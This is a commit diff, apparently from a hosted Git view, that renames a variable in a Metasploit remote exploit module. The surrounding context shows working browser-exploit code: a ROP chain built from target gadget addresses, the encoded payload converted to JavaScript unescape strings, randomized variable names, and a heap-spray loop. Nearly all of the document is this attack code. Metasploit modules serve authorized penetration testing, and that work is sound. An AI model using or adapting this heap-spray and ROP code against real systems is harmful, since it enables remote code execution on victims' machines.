Fix broken target (variable naming)
This commit is contained in:
parent
2fccf4674f
commit
952ada1742
|
@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# Create the payload
|
||||
print_status("Creating payload for #{target.name}")
|
||||
print_status("Creating payload for #{my_target.name}")
|
||||
table =
|
||||
[
|
||||
0x0c0c0c0c, # index
|
||||
|
@ -194,15 +194,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
].pack("V*")
|
||||
|
||||
rop = rand_text_alpha_upper(56)
|
||||
rop << [ target['PopEax'] ].pack("V")
|
||||
rop << [ my_target['PopEax'] ].pack("V")
|
||||
rop << rand_text_alpha_upper(40)
|
||||
rop << get_rop_chain(target['FF'],target['OS'])
|
||||
rop << get_rop_chain(my_target['FF'],my_target['OS'])
|
||||
|
||||
# Encode table, chain and payload
|
||||
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch))
|
||||
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(my_target.arch))
|
||||
|
||||
code = payload.encoded
|
||||
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
|
||||
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
|
||||
|
||||
# random JavaScript variable names
|
||||
i_name = rand_text_alpha(rand(10) + 5)
|
||||
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
var #{rop_name} = unescape("#{rop_js}");
|
||||
var #{code_name} = unescape("#{code_js}");
|
||||
var #{offset_length_name} = #{target['OffSet']};
|
||||
var #{offset_length_name} = #{my_target['OffSet']};
|
||||
|
||||
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
|
||||
{
|
||||
|
@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
|
||||
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
|
||||
|
||||
while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
|
||||
while (#{single_sprayblock_name}.length < #{my_target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
|
||||
|
||||
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2);
|
||||
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{my_target['Size']}-6)/2);
|
||||
|
||||
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
|
||||
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();
|
||||
|
|
Loading…
Reference in New Issue